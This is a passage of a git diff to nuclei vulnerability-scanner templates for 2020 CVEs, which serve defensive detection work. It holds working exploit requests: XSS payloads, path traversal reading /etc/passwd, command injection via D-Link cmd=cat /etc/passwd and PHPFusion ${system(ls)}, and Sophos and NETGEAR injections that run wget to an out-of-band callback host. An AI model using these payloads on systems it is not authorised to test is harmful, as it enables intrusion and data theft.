reflected cross-site scripting vulnerability. - reference: - - https://www.jenkins.io/security/advisory/2020-03-09/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-2140 - - https://jenkins.io/security/advisory/2020-03-09/#SECURITY-1722 - - http://www.openwall.com/lists/oss-security/2020/03/09/1 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-2140 - cwe-id: CWE-79 - tags: cve,cve2020,jenkins,xss,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample" - - "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample" - - matchers-condition: and - matchers: - - type: word - words: - -

    sample - part: body - - - type: word - words: - - "text/html" - part: header - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/04 diff --git a/nuclei-templates/CVE-2020/CVE-2020-22840.yaml b/nuclei-templates/CVE-2020/CVE-2020-22840.yaml new file mode 100644 index 0000000000..a642e28b21 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-22840.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-22840 + +info: + name: b2evolution CMS - Open Redirect + author: geeknik + severity: medium + description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. + reference: + - https://github.com/b2evolution/b2evolution/issues/102 + - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html + - https://www.exploit-db.com/exploits/49554 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-22840 + cwe-id: CWE-601 + tags: cve,cve2020,redirect,b2evolution + +requests: + - method: GET + path: + - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-23517.yaml b/nuclei-templates/CVE-2020/CVE-2020-23517.yaml new file mode 100644 index 0000000000..644463c4a1 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-23517.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-23517 + +info: + name: Aryanic HighMail (High CMS) Cross-Site Scripting + author: geeknik + severity: medium + description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-23517 + - https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-23517 + cwe-id: CWE-79 + tags: xss,cve,cve2020 + +requests: + - method: GET + path: + - "{{BaseURL}}/login/?uid=\">" + + matchers-condition: and + matchers: + - type: word + words: + - text/html + part: header + - type: word + words: + - "' - part: body - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/05/04 diff --git a/nuclei-templates/CVE-2020/cve-2020-24391.yaml b/nuclei-templates/CVE-2020/CVE-2020-24391.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-24391.yaml rename to nuclei-templates/CVE-2020/CVE-2020-24391.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24550.yaml b/nuclei-templates/CVE-2020/CVE-2020-24550.yaml new file mode 100644 index 0000000000..b7eecbd3ea --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-24550.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-24550 + +info: + name: EpiServer <13.2.7 - Open Redirect + author: dhiyaneshDK + severity: medium + description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. + reference: + - https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-24550 + cwe-id: CWE-601 + tags: cve,cve2020,redirect,episerver + +requests: + - method: GET + path: + - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com' + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Location: https://example.com" + + - type: status + status: + - 301 diff --git a/nuclei-templates/CVE-2020/CVE-2020-24571.yaml b/nuclei-templates/CVE-2020/CVE-2020-24571.yaml index c54df7ed6f..7ac3c519d7 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-24571.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-24571.yaml @@ -1,18 +1,16 @@ id: CVE-2020-24571 - info: name: NexusDB v4.50.22 Path Traversal author: pikpikcu severity: high description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal. - reference: - - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 + reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 + tags: cve,cve2020,nexusdb,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2020-24571 cwe-id: CWE-22 - tags: cve,cve2020,nexusdb,lfi requests: - method: GET diff --git a/nuclei-templates/CVE-2020/CVE-2020-24579.yaml b/nuclei-templates/CVE-2020/CVE-2020-24579.yaml deleted file mode 100644 index 98bea02cd2..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-24579.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2020-24579 - -info: - name: D-Link DSL 2888a - Remote Command Execution - author: pikpikcu - severity: high - description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. - reference: - - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ - - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/ - classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-24579 - cwe-id: CWE-287 - tags: cve,cve2020,dlink,rce - -requests: - - raw: - - | # Response:Location: /page/login/login_fail.html - POST / HTTP/1.1 - Host: {{Hostname}} - Cookie: uid=6gPjT2ipmNz - - username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b - - - | # Get /etc/passwd - GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Cookie: uid=6gPjT2ipmNz - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "nobody:[x*]:65534:65534" - - "root:.*:0:0:" - condition: or diff --git a/nuclei-templates/CVE-2020/CVE-2020-24589.yaml b/nuclei-templates/CVE-2020/CVE-2020-24589.yaml index 85c9c535b0..e15fc3ed20 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-24589.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-24589.yaml @@ -1,19 +1,16 @@ id: CVE-2020-24589 info: - name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection + name: WSO2 API Manager Blind XXE author: lethargynavigator severity: critical - description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend - or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 - - https://nvd.nist.gov/vuln/detail/CVE-2020-24589 + description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XXE. + reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 + tags: cve,cve2020,wso2,xxe,oast,blind classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2020-24589 - tags: cve,cve2020,wso2,xxe,oast,blind requests: - raw: @@ -35,5 +32,3 @@ requests: part: body words: - "Failed to install the generic artifact type" - -# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2020/cve-2020-24765.yaml b/nuclei-templates/CVE-2020/CVE-2020-24765.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-24765.yaml rename to nuclei-templates/CVE-2020/CVE-2020-24765.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24912.yaml b/nuclei-templates/CVE-2020/CVE-2020-24912.yaml new file mode 100644 index 0000000000..4e643f01c3 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-24912.yaml @@ -0,0 +1,43 @@ +id: CVE-2020-24912 + +info: + name: QCube Cross-Site-Scripting + author: pikpikcu + severity: medium + description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + reference: + - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 + - https://github.com/qcubed/qcubed/pull/1320/files + - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 + - http://seclists.org/fulldisclosure/2021/Mar/30 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-24912 + cwe-id: CWE-79 + tags: cve,cve2020,qcubed,xss + +requests: + - method: POST + path: + - "{{BaseURL}}/assets/_core/php/profile.php" + - "{{BaseURL}}/assets/php/profile.php" + - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + +# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2020/CVE-2020-24949.yaml b/nuclei-templates/CVE-2020/CVE-2020-24949.yaml deleted file mode 100644 index c6e3ecb048..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-24949.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2020-24949 - -info: - name: PHPFusion 9.03.50 Remote Code Execution - author: geeknik - severity: high - description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). - reference: - - https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt - - https://github.com/php-fusion/PHP-Fusion/issues/2312 - - http://packetstormsecurity.com/files/162852/PHPFusion-9.03.50-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-24949 - tags: cve,cve2020,phpfusion,rce,php - -requests: - - method: GET - path: - - "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}" - - matchers-condition: and - matchers: - - - type: status - status: - - 200 - - - type: word - part: body - words: - - "infusion_db.php" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-25078.yaml b/nuclei-templates/CVE-2020/CVE-2020-25078.yaml index 6dfff9d5bc..7f8a7cfa59 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-25078.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-25078.yaml @@ -5,15 +5,13 @@ info: author: pikpikcu severity: high description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-25078 - - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180 - - https://twitter.com/Dogonsecurity/status/1273251236167516161 + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078 + tags: cve,cve2020,dlink classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2020-25078 - tags: cve,cve2020,dlink + requests: - method: GET diff --git a/nuclei-templates/CVE-2020/CVE-2020-25223.yaml b/nuclei-templates/CVE-2020/CVE-2020-25223.yaml deleted file mode 100644 index b8f310742c..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-25223.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2020-25223 - -info: - name: Sophos UTM Preauth Remote Code Execution - author: gy741 - severity: critical - description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11. - reference: - - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 - - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223 - - https://nvd.nist.gov/vuln/detail/CVE-2020-25223 - - https://community.sophos.com/b/security-blog - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-25223 - tags: cve,cve2020,sophos,rce,oast,unauth - -requests: - - raw: - - | - POST /var HTTP/1.1 - Host: {{Hostname}} - Accept: text/javascript, text/html, application/xml, text/xml, */* - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - X-Requested-With: XMLHttpRequest - X-Prototype-Version: 1.5.1.1 - Content-Type: application/json; charset=UTF-8 - Origin: {{BaseURL}} - Connection: close - Referer: {{BaseURL}} - Sec-Fetch-Dest: empty - Sec-Fetch-Mode: cors - Sec-Fetch-Site: same-origin - - {"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/03/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-25495.yaml b/nuclei-templates/CVE-2020/CVE-2020-25495.yaml new file mode 100644 index 0000000000..006e87b30c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-25495.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-25495 + +info: + name: SCO Openserver 5.0.7 - 'section' Cross-Site scripting + author: 0x_Akoko + severity: medium + description: A reflected cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'. + reference: + - https://www.exploit-db.com/exploits/49300 + - https://github.com/Ramikan/Vulnerabilities/blob/master/SCO%20Openserver%20XSS%20%26%20HTML%20Injection%20vulnerability + - http://packetstormsecurity.com/files/160634/SCO-Openserver-5.0.7-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-25495 + cwe-id: CWE-79 + tags: cve,cve2020,sco,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "

    hello

    " + part: body + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-25540.yaml b/nuclei-templates/CVE-2020/CVE-2020-25540.yaml new file mode 100644 index 0000000000..09ea481ed3 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-25540.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-25540 + +info: + name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) + author: geeknik + severity: high + description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. + reference: + - https://www.exploit-db.com/exploits/48812 + - https://github.com/zoujingli/ThinkAdmin/issues/244 + - https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/ + - http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-25540 + cwe-id: CWE-22 + tags: cve,cve2020,thinkadmin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2020/cve-2020-26153.yaml b/nuclei-templates/CVE-2020/CVE-2020-26153.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-26153.yaml rename to nuclei-templates/CVE-2020/CVE-2020-26153.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-26413.yaml b/nuclei-templates/CVE-2020/CVE-2020-26413.yaml deleted file mode 100644 index 1edfd26a41..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-26413.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2020-26413 - -info: - name: Gitlab User enumeration via Graphql API - author: _0xf4n9x_,pikpikcu - severity: medium - description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible. - reference: - - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 - - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json - - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2020-26413 - cwe-id: CWE-200 - metadata: - shodan-query: http.title:"GitLab" - tags: cve,cve2020,gitlab,exposure,enum,graphql - -requests: - - raw: - - | - POST /api/graphql HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }", - "variables": null, - "operationName": null - } - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"username":' - - '"avatarUrl":' - - '"node":' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: json - part: body - json: - - '.data.users.edges[].node.email' diff --git a/nuclei-templates/CVE-2020/CVE-2020-26919.yaml b/nuclei-templates/CVE-2020/CVE-2020-26919.yaml deleted file mode 100644 index f20753ee21..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-26919.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-26919 - -info: - name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution - author: gy741 - severity: critical - description: NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. - reference: - - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-26919 - - https://kb.netgear.com/000062334/Security-Advisory-for-Missing-Function-Level-Access-Control-on-JGS516PE-PSV-2020-0377 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-26919 - tags: cve,cve2020,netgear,rce,oast,router,unauth - -requests: - - raw: - - | - POST /login.htm HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd= - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/03/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-26948.yaml b/nuclei-templates/CVE-2020/CVE-2020-26948.yaml new file mode 100644 index 0000000000..82117e89d1 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-26948.yaml @@ -0,0 +1,37 @@ +id: CVE-2020-26948 + +info: + name: Emby Server Server-Side Request Forgery + author: dwisiswant0 + severity: critical + description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter. + reference: + - https://github.com/btnz-k/emby_ssrf + - https://nvd.nist.gov/vuln/detail/CVE-2020-26948 + - https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-26948 + cwe-id: CWE-918 + tags: cve,cve2020,emby,jellyfin,ssrf + +requests: + - method: GET + path: + - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net" + matchers-condition: and + matchers: + - type: status + status: + - 500 + - type: word + words: + - "Name or service not known" + part: body + - type: word + words: + - "text/plain" + part: header + +# Enhanced by mp on 2022/03/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-27191.yaml b/nuclei-templates/CVE-2020/CVE-2020-27191.yaml index 78e22728b9..27d923704b 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-27191.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-27191.yaml @@ -1,22 +1,34 @@ id: CVE-2020-27191 info: - name: LionWiki 3.2.11 - LFI + name: LionWiki <3.2.12 - Local File Inclusion author: 0x_Akoko severity: high - description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion. + description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. + remediation: | + Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability. reference: - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi - http://lionwiki.0o.cz/index.php?page=Main+page - - https://www.cvedetails.com/cve/CVE-2020-27191 + - https://nvd.nist.gov/vuln/detail/CVE-2020-27191 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27191 cwe-id: CWE-22 - tags: cve,cve2020,lionwiki,lfi,oss + epss-score: 0.01572 + epss-percentile: 0.86986 + cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: lionwiki + product: lionwiki + tags: cve2020,cve,lionwiki,lfi,oss -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1" @@ -30,3 +42,4 @@ requests: - type: status status: - 200 +# digest: 480a00453043022024fd9eabd5990697a1c0d513e268964dba7e4032104e676f2c1516f0d7bf1e6c021f01979b841bd595af2324f5a4beea443729213ab4e816a2f27b4f681dfe71ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-27361.yaml b/nuclei-templates/CVE-2020/CVE-2020-27361.yaml deleted file mode 100644 index cee31b2f96..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-27361.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2020-27361 - -info: - name: Akkadian Provisioning Manager - Files Listing - author: gy741 - severity: high - description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories. - reference: - - https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-27361 - cwe-id: CWE-668 - tags: cve,cve2020,akkadian,listing,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/pme/media/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of /pme/media" - - "Parent Directory" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-27467.yaml b/nuclei-templates/CVE-2020/CVE-2020-27467.yaml index 63b939873e..e6cea59742 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-27467.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-27467.yaml @@ -1,23 +1,35 @@ id: CVE-2020-27467 info: - name: Processwire CMS < 2.7.1 - Directory Traversal + name: Processwire CMS <2.7.1 - Local File Inclusion author: 0x_Akoko severity: high - description: Local File Inclusion in Processwire CMS < 2.7.1 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system. + description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the system. + remediation: | + Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability. reference: - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire - https://processwire.com/ - - https://www.cvedetails.com/cve/CVE-2020-27467 - https://github.com/ceng-yildirim/LFI-processwire + - https://nvd.nist.gov/vuln/detail/CVE-2020-27467 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27467 cwe-id: CWE-22 + epss-score: 0.01056 + epss-percentile: 0.83739 + cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: processwire + product: processwire tags: cve,cve2020,processwire,lfi,cms,oss -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?download=/etc/passwd" @@ -31,3 +43,4 @@ requests: - type: status status: - 200 +# digest: 490a00463044022005cc8cc6d259f90bddcc4ab74577e25407c52171a5893d763b5d5ab1dd6159c602204a99b859d07b48c2f47cf2a1a8329315e236c3999217ea353e49076587c74df0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-27735.yaml b/nuclei-templates/CVE-2020/CVE-2020-27735.yaml new file mode 100644 index 0000000000..d41f8d89b4 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-27735.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-27735 + +info: + name: Wing FTP's Web Interface XSS + author: pikpikcu + severity: medium + description: | + An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-27735 + - https://www.wftpserver.com/serverhistory.htm + - https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-27735 + cwe-id: CWE-79 + tags: cve,cve2020,xss,wing-ftp + +requests: + - method: GET + path: + - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2020/CVE-2020-27866.yaml b/nuclei-templates/CVE-2020/CVE-2020-27866.yaml index 0bd51729fb..81151b66a4 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-27866.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-27866.yaml @@ -4,8 +4,8 @@ info: name: NETGEAR Authentication Bypass vulnerability author: gy741 severity: high - 